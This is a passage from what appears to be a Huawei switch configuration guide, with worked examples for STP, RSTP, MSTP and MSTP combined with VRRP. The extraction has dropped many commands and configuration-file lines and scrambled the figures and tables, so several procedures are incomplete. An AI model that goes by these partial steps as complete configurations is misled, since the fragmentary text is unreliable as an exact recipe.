detected)

------------------------------------------------------------------------------
----
The preceding command output shows that GE1/0/2 is blocked.

3. Shut down GE1/0/1. After 30s, run the display loopback-detect command to check
whether GE1/0/2 is restored.
5
------------------------------------------------------------------------------
----
Status
------------------------------------------------------------------------------
----
NORMAL
GigabitEthernet1/0/2 30 block NORMAL
------------------------------------------------------------------------------
----
The preceding command output shows that GE1/0/2 is restored.
----End
Configuration Files
#
sysname Switch
#
vlan batch 100
#
#
#
return

Typical Configuration Examples 7 Typical Examples of MSTP/RRPP/SEP/VBST
7 Typical Examples of MSTP/RRPP/SEP/

VBST
About This Chapter
7.1 Example for Configuring STP

7.2 Example for Configuring RSTP
7.3 Example for Configuring MSTP
7.4 Example for Configuring MSTP and VRRP
7.5 Example for Configuring a Single RRPP Ring with a Single Instance
7.6 Example for Configuring Tangent RRPP Rings
7.7 Example for Configuring RRPP Snooping on a VPLS Network
7.8 Example for Configuring SEP and MSTP on a Network
7.9 Example for Configuring SEP and RRPP on a Network
7.10 Example for Configuring VBST

7.1 Example for Configuring STP

STP Overview
Generally, redundant links are used on an Ethernet switching network to provide link backup
and enhance network reliability. The use of redundant links, however, may produce loops,
causing broadcast storms and rendering the MAC address table unstable. As a result, the
communication quality deteriorates, and communication services may even be interrupted.
The Spanning Tree Protocol (STP) is used to solve these problems. STP prevents loops.
Devices running STP discover loops on the network by exchanging information with each
other, and block some ports to eliminate loops.
STP refers to STP defined in IEEE 802.1D, the Rapid Spanning Tree Protocol (RSTP) defined
in IEEE 802.1W, and the Multiple Spanning Tree Protocol (MSTP) defined in IEEE 802.1S.
MSTP is compatible with RSTP and STP, and RSTP is compatible with STP. Table 7-1
compares STP, RSTP, and MSTP.
Table 7-1 Comparisons among STP, RSTP, and MSTP
Spannin Characteristics Application Scenario

g Tree
Protocol
STP l Forms a loop-free tree to prevent User or service traffic does not need
broadcast storms and implement to be differentiated, and all VLANs
redundancy. share a spanning tree.
l Provides slow convergence.
RSTP l Forms a loop-free tree to prevent

broadcast storms and implement
redundancy.
l Provides fast convergence.
MSTP l Forms multiple loop-free trees to User or service traffic needs to be

prevent broadcast storms and differentiated and load balanced.
implement redundancy. Traffic from different VLANs is
l Provides fast convergence. forwarded through different spanning
trees that are independent of each
l Implements load balancing other.
among VLANs and forwards
traffic in different VLANs along
different paths.
Configuration Notes
l The ports connected to terminals do not participate in STP calculation, so you are
advised to configure the ports as edge ports or disable STP on the ports.

To implement redundancy on a complex network, network designers tend to deploy multiple
physical links between two devices, one of which is the primary link and the others are
backup links. Loops may occur, causing broadcast storms or MAC address entry damage.
After a network designer deploys a network, STP can be deployed on the network to prevent
loops. When loops exist on a network, STP blocks a port to eliminate the loops. As shown in
Figure 7-1, SwitchA, SwitchB, SwitchC, and SwitchD running STP exchange STP BPDUs to
discover loops on the network and block ports to prune the network into a loop-free tree
network. STP prevents infinite looping of packets to ensure packet processing capabilities of
switches.
Figure 7-1 STP networking
N e tw o rk
G E 1 /0 /3 G E 1 /0 /3
Root
S w itc h D G E 1 /0 /1 G E 1 /0 /1
B rid g e
G E 1 /0 /2 G E 1 /0 /2 S w itc h A
STP
G E 1 /0 /3 G E 1 /0 /3
S w itc h C S w itc h B
G E 1 /0 /1 G E 1 /0 /1
G E 1 /0 /2 G E 1 /0 /2
PC1 PC2
B lo cke d p o rt
Configure basic STP functions on switching devices of the ring network.
1. Configure the switching devices on the ring network to work in STP mode.
2. Configure the root bridge and secondary root bridge.
3. Configure the path cost of a port so that the port can be blocked.
4. Enable STP to eliminate loops.
Procedure
Step 1 Configure basic STP functions.
1. Configure the switching devices on the ring network to work in STP mode.
# Configure SwitchA to work in STP mode.

[SwitchA] stp mode stp
# Configure SwitchB to work in STP mode.

[SwitchB] stp mode stp
# Configure SwitchC to work in STP mode.

[HUAWEI] sysname SwitchC
[SwitchC] stp mode stp
# Configure SwitchD to work in STP mode.

[HUAWEI] sysname SwitchD
[SwitchD] stp mode stp

# Configure SwitchA as the root bridge.
[SwitchA] stp root primary
# Configure SwitchD as the secondary root bridge.

[SwitchD] stp root secondary
NOTE
– The path cost range depends on the algorithm. Huawei proprietary algorithm is used as an
example. Set the path costs of the ports to be blocked to 20000.
– Switching devices on the same network must use the same algorithm to calculate the path cost
of ports.
# Configure SwitchA to use Huawei proprietary algorithm to calculate the path cost.
[SwitchA] stp pathcost-standard legacy
# Configure SwitchB to use Huawei proprietary algorithm to calculate the path cost.
[SwitchB] stp pathcost-standard legacy
# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost.
[SwitchC] stp pathcost-standard legacy
# Set the path cost of GigabitEthernet1/0/1 on SwitchC to 20000.

[SwitchC] interface gigabitethernet 1/0/1
[SwitchC-GigabitEthernet1/0/1] stp cost 20000
[SwitchC-GigabitEthernet1/0/1] quit
# Configure SwitchD to use Huawei proprietary algorithm to calculate the path cost.
[SwitchD] stp pathcost-standard legacy
4. Enable STP to eliminate loops.

– Configure the ports connected to PCs as edge ports and BPDU filter ports.
# Configure GigabitEthernet1/0/2 of SwitchB as an edge port and BPDU filter port.
[SwitchB-GigabitEthernet1/0/2] stp edged-port enable
[SwitchB-GigabitEthernet1/0/2] stp bpdu-filter enable
# Configure GigabitEthernet1/0/2 of SwitchC as an edge port and BPDU filter port.

[SwitchC-GigabitEthernet1/0/2] stp edged-port enable
[SwitchC-GigabitEthernet1/0/2] stp bpdu-filter enable

– Enable STP globally on devices.

# Enable STP globally on SwitchA.
[SwitchA] stp enable
# Enable STP globally on SwitchB.

[SwitchB] stp enable
# Enable STP globally on SwitchC.

[SwitchC] stp enable
# Enable STP globally on SwitchD.

[SwitchD] stp enable

After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration.
# Run the display stp brief command on SwitchA to view the port status and protection type.
The displayed information is as follows:
[SwitchA] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 DESI FORWARDING NONE
After SwitchA is configured as the root bridge, GigabitEthernet1/0/2 and

GigabitEthernet1/0/1 connected to SwitchB and SwitchD are selected as designed ports.
# Run the display stp interface gigabitethernet 1/0/1 brief command on SwitchB to check
the status of GigabitEthernet1/0/1. The following information is displayed:
[SwitchB] display stp interface gigabitethernet 1/0/1 brief
GigabitEthernet1/0/1 becomes the designated port and is in FORWARDING state.

# Run the display stp brief command on SwitchC to check the port status.
[SwitchC] display stp brief
0 GigabitEthernet1/0/1 ALTE DISCARDING NONE
0 GigabitEthernet1/0/3 ROOT FORWARDING NONE
GigabitEthernet1/0/3 becomes the root port and is in FORWARDING state.

GigabitEthernet1/0/1 becomes the alternate port and is in DISCARDING state.
----End
Configuration Files
#
sysname SwitchA
#
stp mode stp
stp instance 0 root primary
stp pathcost-standard legacy
#
return

#
sysname SwitchB
#
stp mode stp
#
stp bpdu-filter
enable
stp edged-port enable

#
return

#
sysname SwitchC
#
stp mode stp
#
stp instance 0 cost 20000
#
stp bpdu-filter
enable

#
return
l Configuration file of SwitchD

#
sysname SwitchD
#
stp mode stp
stp instance 0 root secondary
#
return
Related Content
Videos
Configuring STP to Prevent Loops
7.2 Example for Configuring RSTP

RSTP Overview


g Tree
Protocol

redundancy.

different paths.
Configuration Notes
l The ports connected to terminals do not participate in RSTP calculation, so you are
After a network designer deploys a network, RSTP can be deployed on the network to prevent
loops. When loops exist on a network, RSTP blocks a port to eliminate the loops. As shown in
Figure 7-2, SwitchA, SwitchB, SwitchC, and SwitchD running RSTP exchange RSTP
BPDUs to discover loops on the network and block ports to prune the network into a loop-free
tree network. RSTP prevents infinite looping of packets to ensure packet processing
capabilities of switches.

Figure 7-2 RSTP networking
N e tw o rk
G E 1 /0 /3 G E 1 /0 /3
Root
S w itc h D G E 1 /0 /1 G E 1 /0 /1
B rid g e
G E 1 /0 /2 G E 1 /0 /2 S w itc h A
RSTP
G E 1 /0 /3 G E 1 /0 /3
S w itc h C S w itc h B
G E 1 /0 /1 G E 1 /0 /1
G E 1 /0 /2 G E 1 /0 /2
PC1 PC2
B lo cke d p o rt
1. Configure basic RSTP functions on switching devices of the ring network.
a. Configure the switching devices on the ring network to work in RSTP mode.
b. Configure the root bridge and secondary root bridge.
c. Configure the path cost of a port so that the port can be blocked.
d. Enable RSTP to eliminate loops.
2. Enable protection functions to protect devices or links. For example, enable root
protection on the designed port of the root bridge.
Procedure
Step 1 Configure basic RSTP functions.
1. Configure the switching devices on the ring network to work in RSTP mode.
# Configure SwitchA to work in RSTP mode.
[SwitchA] stp mode rstp
# Configure SwitchB to work in RSTP mode.

[SwitchB] stp mode rstp
# Configure SwitchC to work in RSTP mode.

[SwitchC] stp mode rstp

# Configure SwitchD to work in RSTP mode.

[SwitchD] stp mode rstp

# Configure SwitchA as the root bridge.
[SwitchA] stp root primary
# Configure SwitchD as the secondary root bridge.

[SwitchD] stp root secondary
NOTE
example. Set the path costs of the ports to be blocked to 20000.
of ports.
# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost.
# Set the path cost of GigabitEthernet1/0/1 on SwitchC to 20000.

[SwitchC-GigabitEthernet1/0/1] stp cost 20000
# Configure SwitchD to use Huawei proprietary algorithm to calculate the path cost.
4. Enable RSTP to eliminate loops.

– Configure the ports connected to PCs as edge ports and configure BPDU filtering.
# Configure GigabitEthernet1/0/2 on SwitchB as an edge port and configure BPDU
filtering.
# Configure GigabitEthernet1/0/2 on SwitchC as an edge port and configure BPDU

filtering.
– Enable RSTP globally on devices.

# Enable RSTP on SwitchA.
# Enable RSTP globally on SwitchB.

# Enable RSTP globally on SwitchC.


# Enable RSTP globally on SwitchD.

Step 2 Enable protection functions. Here, root protection is used on the designated port of the root
bridge.
# Configure root protection on GigabitEthernet1/0/1 of SwitchA.
[SwitchA-GigabitEthernet1/0/1] stp root-protection
# Configure root protection on GigabitEthernet1/0/2 of SwitchA.


# Run the display stp brief command on SwitchA to view the status and protection type on
the ports. The displayed information is as follows:
0 GigabitEthernet1/0/1 DESI FORWARDING ROOT
After SwitchA is configured as the root bridge, GigabitEthernet1/0/2 and

GigabitEthernet1/0/1 connected to SwitchB and SwitchD become designed ports and
configured with root protection.
# Run the display stp interface gigabitethernet 1/0/1 brief command on SwitchB to check
the status of GigabitEthernet1/0/1. The following information is displayed:
[SwitchB] display stp interface gigabitethernet 1/0/1 brief
GigabitEthernet1/0/1 becomes the designated port and is in FORWARDING state.

# Run the display stp brief command on SwitchC to check the port status.
GE1/0/1 becomes the alternate port and is in DISCARDING state.

GE1/0/3 becomes the root port and is in FORWARDING state.
----End
Configuration Files
#
sysname SwitchA
#
stp mode rstp


#
stp root-protection
#
stp root-protection
#
return

#
sysname SwitchB
#
stp mode rstp
#
stp bpdu-filter enable
#
return

#
sysname SwitchC
#
stp mode rstp
#
#
#
return

#
sysname SwitchD
#
stp mode rstp
#
return
Related Content
Videos
Configuring STP to Prevent Loops
7.3 Example for Configuring MSTP

MSTP Overview


g Tree
Protocol

redundancy.

different paths.
Configuration Notes
l The ports connected to terminals do not participate in MSTP calculation, so you are
MSTP can be used to prevent loops. MSTP blocks redundant links and prunes a network into
a tree topology free from loops.
As shown in Figure 7-3, SwitchA, SwitchB, SwitchC, and SwitchD run MSTP. MSTP uses
multiple instances to implement load balancing of traffic in VLANs 2 to 10 and VLANs 11 to

20. The VLAN mapping table that defines the mapping between VLANs and MSTIs can be
used.
Figure 7-3 MSTP networking
Network
RG1
SwitchA Eth-Trunk1 SwitchB
GE1/0/1 Eth-Trunk1 GE1/0/1
GE1/0/3 GE1/0/3
GE1/0/2
SwitchC SwitchD
GE1/0/2
GE1/0/1 GE1/0/1
VLAN 2~10 MSTI 1

VLAN 11~20 MSTI 2
MSTI 1:
Root Switch:SwitchA
Blocked port
MSTI 2:
Root Switch:SwitchB
Blocked port
1. Configure basic MSTP functions on switching devices of the ring network.

protection on the designed port of the root bridge in each MSTI.
NOTE
When the link between the root bridge and secondary root bridge goes Down, the port enabled with root
protection becomes Discarding because root protection takes effect.
To improve the reliability, you are advised to bind the link between the root bridge and secondary root
bridge to an Eth-Trunk.
3. Configure Layer 2 forwarding on devices.
Procedure
Step 1 Configure basic MSTP functions.
1. Configure SwitchA, SwitchB, SwitchC, and SwitchD (access switches) in the MST
region RG1 and create MSTI 1 and MSTI 2.
NOTE
Two switches belong to the same MST region when they have the same:
– Name of the MST region
– Mapping between VLANs and MSTIs
– Revision level of the MST region
# Configure an MST region of root bridge SwitchA in MSTI 1.
[SwitchA] stp region-configuration
[SwitchA-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchA-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchA-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchA-mst-region] active region-configuration //Activate the MST region
configuration.
[SwitchA-mst-region] quit
# Configure an MST region of root bridge SwitchB in MSTI 1.

[SwitchB] stp region-configuration
[SwitchB-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchB-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchB-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchB-mst-region] active region-configuration //Activate the MST region
configuration.
[SwitchB-mst-region] quit
# Configure an MST region of SwitchC.

[SwitchC] stp region-configuration
[SwitchC-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchC-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchC-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.
[SwitchC-mst-region] active region-configuration //Activate the MST region
configuration.
[SwitchC-mst-region] quit
# Configure an MST region of SwitchD.

[SwitchD] stp region-configuration
[SwitchD-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchD-mst-region] instance 1 vlan 2 to 10 //Map VLANs 2 to 10 to MSTI 1.
[SwitchD-mst-region] instance 2 vlan 11 to 20 //Map VLANs 11 to 20 to MSTI 2.

[SwitchD-mst-region] active region-configuration //Activate the MST region

configuration.
[SwitchD-mst-region] quit
2. Configure root bridges and secondary root bridges of MSTI 1 and MSTI 2 in the MST
region RG1.
– Configure the root bridge and secondary root bridge in MSTI 1.
# Configure SwitchA as the root bridge in MSTI 1.
[SwitchA] stp instance 1 root primary
# Configure SwitchB as the secondary root bridge in MSTI 1.

[SwitchB] stp instance 1 root secondary

# Configure SwitchB as the root bridge in MSTI 2.
[SwitchB] stp instance 2 root primary
# Configure SwitchA as the secondary root bridge in MSTI 2.

[SwitchA] stp instance 2 root secondary
3. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to be larger than the
default values.
NOTE
example. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to 20000.
of ports.
Configure SwitchA to use Huawei proprietary algorithm to calculate the path cost.
# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost and
set the path cost of GE1/0/2 to 20000 in MSTI 2.
[SwitchC-GigabitEthernet1/0/2] stp instance 2 cost 20000
# Configure SwitchD to use Huawei proprietary algorithm to calculate the path cost and
set the path cost of GE1/0/2 to 20000 in MSTI 1.
[SwitchD] interface gigabitethernet 1/0/2
[SwitchD-GigabitEthernet1/0/2] stp instance 1 cost 20000
[SwitchD-GigabitEthernet1/0/2] quit
4. Enable MSTP to eliminate loops.

– Enable MSTP globally on devices.
# Enable MSTP on SwitchB.

# Enable MSTP on SwitchC.

# Enable MSTP on SwitchD.

– Configure the ports connected to the terminal as edge ports and BPDU filter ports.

# Configure GE1/0/1 of SwitchC as an edge port and BPDU filter port.

# Configure GE1/0/1 of SwitchC as an edge port and BPDU filter port.

[SwitchD-GigabitEthernet1/0/1] stp edged-port enable
[SwitchD-GigabitEthernet1/0/1] stp bpdu-filter enable
Step 2 Enable protection functions. For example, enable root protection on the designed port of the
root bridge in each MSTI.
# Enable root protection on GE1/0/1 of SwitchA.
# Enable root protection on GE1/0/1 of SwitchB.

[SwitchB-GigabitEthernet1/0/1] stp root-protection
Step 3 Configure Layer 2 forwarding on switches of the ring network.

l Create VLANs 2 to 20 on SwitchA, SwitchB, SwitchC, and SwitchD.
# Create VLANs 2 to 20 on SwitchA.
# Create VLANs 2 to 20 on SwitchB.

[SwitchB] vlan batch 2 to 20
# Create VLANs 2 to 20 on SwitchC.

[SwitchC] vlan batch 2 to 20
# Create VLANs 2 to 20 on SwitchD.

[SwitchD] vlan batch 2 to 20
l Add ports connected to the ring to VLANs.

# Add GE1/0/1 on SwitchA to VLANs.
# Add Eth-Trunk1 on SwitchA to VLANs.

[SwitchA] interface Eth-Trunk 1
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/2
[SwitchA-Eth-Trunk1] trunkport gigabitethernet 1/0/3
# Add GE1/0/1 on SwitchB to VLANs.

[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 to 20
# Add Eth-Trunk1 on SwitchB to VLANs.

[SwitchB] interface Eth-Trunk 1
[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/2

[SwitchB-Eth-Trunk1] trunkport gigabitethernet 1/0/3

[SwitchB-Eth-Trunk1] port link-type trunk
[SwitchB-Eth-Trunk1] port trunk allow-pass vlan 2 to 20
# Add GE1/0/1 on SwitchC to VLANs.

[SwitchC-GigabitEthernet1/0/1] port link-type access
[SwitchC-GigabitEthernet1/0/1] port default vlan 2

[SwitchC-GigabitEthernet1/0/2] port link-type trunk
[SwitchC-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 20

# Add GE1/0/1 on SwitchD to VLANs.

[SwitchD-GigabitEthernet1/0/1] port link-type access
[SwitchD-GigabitEthernet1/0/1] port default vlan 11

[SwitchD-GigabitEthernet1/0/2] port link-type trunk
[SwitchD-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 to 20

[SwitchD-GigabitEthernet1/0/3] port trunk allow-pass vlan 2 to 20

NOTE
MSTI 1 and MSTI 2 are used as examples, so you do not need to check the port status in MSTI 0.
0 Eth-Trunk1 DESI FORWARDING NONE
2 Eth-Trunk1 ROOT FORWARDING NONE
In MSTI 1, Eth-Trunk1 and GE1/0/1 on SwitchA are designed ports because SwitchA is the
root bridge. In MSTI 2, GE1/0/1 on SwitchA is the designed port and Eth-Trunk1 is the root
port.
# Run the display stp brief command on SwitchB. The following information is displayed:

[SwitchB] display stp brief

In MSTI 2, GE1/0/1 and Eth-Trunk1 on SwitchB are designed ports because SwitchB is the
root bridge. In MSTI 1, GE1/0/1 on SwitchB is the designed port and Eth-Trunk1 is the root
port.
# Run the display stp interface brief command on SwitchC. The following information is
displayed:
[SwitchC] display stp interface gigabitethernet 1/0/3 brief
GE1/0/3 on SwitchC is the root port in MSTI 1 and MSTI 2. GE1/0/2 on SwitchC is blocked
in MSTI 2 and is the designated port in MSTI 1.
# Run the display stp interface brief command on SwitchD. The following information is
displayed:
[SwitchD] display stp interface gigabitethernet 1/0/3 brief
[SwitchD] display stp interface gigabitethernet 1/0/2 brief
GE1/0/3 on SwitchD is the root port in MSTI 1 and MSTI 2. GE1/0/2 on SwitchD is blocked
in MSTI 1 and is the designated port in MSTI 2.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 2 to 20
#
#
stp region-configuration
region-name RG1
instance 1 vlan 2 to 10
active region-configuration

#
#
stp root-protection
#
eth-trunk 1
#
eth-trunk 1
#
return
#
sysname SwitchB
#
vlan batch 2 to 20
#
#
region-name RG1
#
#
stp root-protection
#
eth-trunk 1
#
eth-trunk 1
#
return
#
sysname SwitchC
#
vlan batch 2 to 20
#
#
region-name RG1
#
port default vlan 2
stp bpdu-filter
enable


#
#
#
return

#
sysname SwitchD
#
vlan batch 2 to 20
#
#
region-name RG1
#
stp bpdu-filter
enable

#
#
#
return
Related Content
Videos
Configuring MSTP to Prevent Loops
7.4 Example for Configuring MSTP and VRRP

MSTP and VRRP
When VRRP is deployed on a network, multiple devices transmit services simultaneously.
Each virtual device consists of one master and several backups. If redundant links need to be
deployed for access backup, MSTP needs to be deployed to eliminate loops and ensure load
balancing of traffic.

Configuration Notes

uct Model
S1270 S12708 and V200R005C00, V200R006C00, V200R007C00,

0 S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
l The ports connected to terminals do not participate in MSTP calculation, so you are
As shown in Figure 7-4, hosts connect to the network through SwitchC. SwitchC is dual-
homed to SwitchA and SwitchB and connect to the Internet. Redundant links are deployed for
access backup. The use of redundant links, however, may produce loops, causing broadcast
storms and rendering the MAC address table unstable.
It is required that network loops be prevented when redundant links are deployed, traffic be
switched to another link when one link is disconnected, and network bandwidth be effectively
used.
MSTP can be configured on the network. MSTP blocks redundant links and prunes a network
into a tree topology free from loops. VRRP can be configured on SwitchA and SwitchB.
HostA connects to the Internet with SwitchA as the default gateway and SwitchB as the
backup gateway; HostB connects to the Internet with SwitchB as the default gateway and
SwitchA as the backup gateway. This setting implements reliability and traffic load balancing.

Figure 7-4 Networking for configuring MSTP and VRRP

V R R P V R ID 1 S w itc h A
V irtu a l IP A d d re s s : V R ID 1 :M a ste r
H o stA 1 0 .1 .2 .1 0 0 V R ID 2 :B a cku p
VLAN 2 /1
1 0 .1 .2 .1 0 1 /2 4 E 1 /0 GE
1 /0
G /3 R o u te rA
GE
GE1/0/2
1 /0
/2 1/ 0 /1
GE
S w itc h C M STP In te rn e t
GE1/0/2
GE
/ 0 /3 1 /0
G E 1 S w itc h C /4
H o stB GE R o u te rB
1 /0 /0 /3
VLAN 3 /1 GE1
1 0 .1 .3 .1 0 1 /2 4 S w itc h B
V R ID 1 :B a cku p
V R R P V R ID 2 V R ID 2 :M a ste r
V irtu a l IP A d d re s s :
1 0 .1 .3 .1 0 0
VLAN 2 M STI 1 VLAN 3 M STI 2
M STI 1: M STI 2:
R o o t S w itch :S w itch A R o o t S w itch :S w itch B

B lo cke d p o rt B lo cke d p o rt
Device Interface VLANIF Interface IP Address
SwitchA GE1/0/1 and VLANIF 2 10.1.2.102/24

GE1/0/2
GE1/0/1 and VLANIF 3 10.1.3.102/24

GE1/0/2
GE1/0/3 VLANIF 4 10.1.4.102/24
SwitchB GE1/0/1 and VLANIF 2 10.1.2.103/24

GE1/0/2
GE1/0/1 and VLANIF 3 10.1.3.103/24

GE1/0/2
GE1/0/3 VLANIF 5 10.1.5.103/24
1. Configure basic MSTP functions on switching devices of the ring network.

a. Configure an MST region and create multi-instance, and map VLAN 2 to MSTI 1
and VLAN 3 to MSTI 2 to load balance traffic.
b. Configure the root bridge and secondary root bridge in each MST region.
c. Configure the path cost of a port in each MSTI so that the port can be blocked.
d. Enable MSTP to prevent loops.
n Enable MSTP globally.
n Enable MSTP on all ports except the ports connected to hosts.
protection on the designed port of the root bridge in each MSTI.
3. Configure Layer 2 forwarding on devices.
NOTE
In this example, SwitchA and SwitchB need to support VRPP and OSPF. For details about the
models supporting VRRP and OSPF, see the documentation.
5. Create VRRP groups 1 and 2 on SwitchA and SwitchB. In VRRP group 1, configure
SwitchA as the master and SwitchB as the backup. In VRRP group 2, configure SwitchB
as the master and SwitchA as the backup.
Procedure
1. Configure SwitchA, SwitchB, and SwitchC in the MST region RG1 and create MSTI 1
and MSTI 2.
# Configure an MST region on SwitchA.
[SwitchA] stp region-configuration //Enter the MST region view.
[SwitchA-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchA-mst-region] instance 1 vlan 2 //Maps VLAN 2 to MSTI 1.
[SwitchA-mst-region] instance 2 vlan 3 //Maps VLAN 3 to MSTI 2.
[SwitchA-mst-region] active region-configuration //Activate the MST region
configuration.
# Configure an MST region on SwitchB.

[SwitchB] stp region-configuration //Enter the MST region view.
[SwitchB-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchB-mst-region] instance 1 vlan 2 //Maps VLAN 2 to MSTI 1.
[SwitchB-mst-region] instance 2 vlan 3 //Maps VLAN 3 to MSTI 2.
[SwitchB-mst-region] active region-configuration //Activate the MST region
configuration.
# Configure an MST region on SwitchC.

[SwitchC] stp region-configuration //Enter the MST region view.
[SwitchC-mst-region] region-name RG1 //Configure the region name as RG1.
[SwitchC-mst-region] instance 1 vlan 2 //Maps VLAN 2 to MSTI 1.
[SwitchC-mst-region] instance 2 vlan 3 //Maps VLAN 3 to MSTI 2.
[SwitchC-mst-region] active region-configuration //Activate the MST region
configuration.
[SwitchC-mst-region] quit

2. Configure root bridges and secondary root bridges of MSTI 1 and MSTI 2 in the MST
region RG1.
# Configure SwitchA as the root bridge in MSTI 1.
[SwitchA] stp instance 1 root primary
# Configure SwitchB as the secondary root bridge in MSTI 1.

[SwitchB] stp instance 1 root secondary

# Configure SwitchB as the root bridge in MSTI 2.
[SwitchB] stp instance 2 root primary
# Configure SwitchA as the secondary root bridge in MSTI 2.

[SwitchA] stp instance 2 root secondary
3. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to be larger than the
default values.
NOTE
example. Set the path costs of the ports to be blocked in MSTI 1 and MSTI 2 to 20000.
of ports.
# Configure SwitchC to use Huawei proprietary algorithm to calculate the path cost, and
set the path cost of GE1/0/1 in MSTI 2 to 20000 and path cost of GE1/0/4 in MSTI 1 to
20000.
4. Enable MSTP to eliminate loops.

– Enable MSTP globally on devices.
# Enable MSTP on SwitchA.
# Enable MSTP on SwitchB.

# Enable MSTP on SwitchC.

– Configure the ports connected to hosts as edge ports and configure BPDU filtering.
[SwitchC-GigabitEthernet1/0/2] stp disable


– Configure the ports connected to the router as edge ports and configure BPDU
filtering.
# Configure the SwitchA.
[SwitchA-GigabitEthernet1/0/3] stp edged-port enable
[SwitchA-GigabitEthernet1/0/3] stp bpdu-filter enable
# Configure the SwitchB.

Step 2 Enable protection functions. For example, enable root protection on the designed port of the
root bridge in each MSTI.
# Enable root protection on GE1/0/1 of SwitchA.
# Enable root protection on GE1/0/1 of SwitchB.

[SwitchB-GigabitEthernet1/0/1] stp root-protection

l Create VLAN 2 and VLAN 3 on SwitchA, SwitchB, and SwitchC.
# Create VLAN 2 and VLAN 3 on SwitchA.
# Create VLAN 2 and VLAN 3 on SwitchB.

[SwitchB] vlan batch 2 to 3
# Create VLAN 2 and VLAN 3 on SwitchC.












NOTE
MSTI 1 and MSTI 2 are used as examples, so you do not need to check the port status in MSTI 0.
In MSTI 1, GE1/0/2 and GE1/0/1 on SwitchA are designed ports because SwitchA is the root
bridge. In MSTI 2, GE1/0/1 on SwitchA is the designed port and GE1/0/2 is the root port.
# Run the display stp brief command on SwitchB. The displayed information is as follows:
In MSTI 2, GE1/0/1 and GE1/0/2 on SwitchB are designed ports because SwitchB is the root
bridge. In MSTI 1, GE1/0/1 on SwitchB is the designed port and GE1/0/2 is the root port.
# Run the display stp interface brief command on SwitchC. The displayed information is as
follows:


GE1/0/1 on SwitchC is the root port in MSTI 1 and is blocked in MSTI 2. GE1/0/4 on
SwitchC is blocked in MSTI 1 and is the designated port in MSTI 2.
# Assign an IP address to each interface. SwitchA is used as an example. The configuration of
SwitchB is similar to that of SwitchA, and is not mentioned here. For details, see the
configuration files.
[SwitchA] vlan batch 4
# Configure OSPF between SwitchA, SwitchB, and router. SwitchA is used as an example.
The configuration of SwitchB is similar to that of SwitchA, and is not mentioned here. For
details, see the configuration files.
[SwitchA] ospf 1
Step 6 Configure VRRP groups.

# Configure VRRP group 1 on SwitchA and SwitchB, set the priority of SwitchA to 120 and
the preemption delay to 20s, and set the default priority for SwitchB.
[SwitchA-Vlanif2] vrrp vrid 1 virtual-ip 10.1.2.100 //Create VRRP group 1 and set
the virtual IP address to 10.1.2.100.
[SwitchA-Vlanif2] vrrp vrid 1 priority 120 //Set the priority of VRRP group 1 to
120.
[SwitchA-Vlanif2] vrrp vrid 1 preempt-mode timer delay 20 //Set the preemption
delay of VRRP group 1 to 20s.
[SwitchB-Vlanif2] vrrp vrid 1 virtual-ip 10.1.2.100 //Create VRRP group 1 and set
# Configure VRRP group 2 on SwitchA and SwitchB, set the priority of SwitchB to 120 and
the preemption delay to 20s, and set the default priority for SwitchA.


[SwitchB-Vlanif3] vrrp vrid 2 virtual-ip 10.1.3.100 //Create VRRP group 2 and set
[SwitchB-Vlanif3] vrrp vrid 2 priority 120 //Set the priority of VRRP group 2 to
120.
[SwitchB-Vlanif3] vrrp vrid 2 preempt-mode timer delay 20 //Set the preemption
delay of VRRP group 2 to 20s.
[SwitchA-Vlanif3] vrrp vrid 2 virtual-ip 10.1.3.100 //Create VRRP group 2 and set
# Set virtual IP address 10.1.2.100 of VRRP group 1 as the default gateway of HostA, and
virtual IP address 10.1.3.100 of VRRP group 2 as the default gateway of HostB.
see that SwitchA is the master in VRRP group 1 and the backup in VRRP group 2.
[SwitchA] display vrrp
State : Master
Virtual IP : 10.1.2.100
Master IP : 10.1.2.102
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

State : Backup
Virtual IP : 10.1.3.100
Master IP : 10.1.3.103
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Create time : 2012-05-11 11:40:18
Last change time : 2012-05-26 11:48:58
# After the configuration is complete, run the display vrrp command on SwitchB. You can
see that SwitchB is the backup in VRRP group 1 and the master in VRRP group 2.
[SwitchB] display vrrp
State : Backup
Virtual IP : 10.1.2.100
Master IP : 10.1.2.102
PriorityRun : 100


TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

State : Master
Virtual IP : 10.1.3.100
Master IP : 10.1.3.103
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
